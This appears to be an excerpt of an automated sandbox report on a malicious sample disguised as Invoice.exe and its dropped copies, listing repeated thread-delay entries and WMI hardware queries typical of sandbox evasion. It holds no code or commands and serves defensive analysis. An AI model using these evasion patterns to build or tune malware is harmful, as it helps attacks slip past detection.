Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6620	Thread sleep count: 3628 > 30
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -99750s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6620	Thread sleep count: 6219 > 30
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -99641s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -99532s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -99407s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -99282s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -99157s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -99047s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -98937s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -98827s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -98719s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -98610s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -98485s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -98360s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -98235s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -98110s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -97985s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -97860s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -97735s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -97610s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -97485s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -97360s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -97235s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1199953s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1199843s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1199734s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1199625s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1199515s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1199406s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1199297s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1199187s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1199078s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1198968s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1198859s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1198750s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1198640s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1198531s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1198422s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1198297s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1198187s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1198078s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1197968s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1197859s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1197749s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1197640s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1197531s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1197419s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1197308s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -1197200s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7224	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -36893488147419080s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -99891s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -99782s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -99657s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -99532s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -99407s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -99282s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -99172s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -99063s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -98938s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -98813s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -98688s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -98563s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -98453s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -98344s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -98219s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -98110s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -97985s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -97860s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -97735s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -97610s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -97485s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -97360s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -97235s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1199922s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1199812s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1199703s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1199594s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1199484s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1199375s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1199265s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1199156s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1199047s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1198936s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1198828s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1198718s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1198608s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1198497s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1198390s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1198281s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1198172s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1198062s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1197952s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1197844s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1197734s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1197583s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1197468s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1197359s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1197061s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7740	Thread sleep time: -1196952s >= -30000s

Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 99752	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 99516	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 99406	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 98938	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 98826	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 98717	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 98609	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 98500	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 98374	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 98265	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 98156	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 98047	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 97926	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 97810	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 97684	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 97578	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 97469	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 97334	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 97218	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 97110	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 97000	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 96891	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 96766	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199953	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199844	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199719	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199610	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199485	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199360	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199235	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199110	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198985	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198860	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198735	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198610	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198485	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198360	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198235	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198110	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1197985	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1197860	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1197735	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1197610	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1197485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 99890
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 99772
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 99656
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 99547
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 99437
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 99328
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 99219
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 99106
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 98984
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 98873
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 98763
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 98640
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 98526
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 98406
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 98297
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 98187
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 98078
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 97968
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 97859
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 97750
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 97640
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 97531
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 97421
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 97312
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 97203
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199938
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199828
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199717
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199594
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199483
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199375
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199266
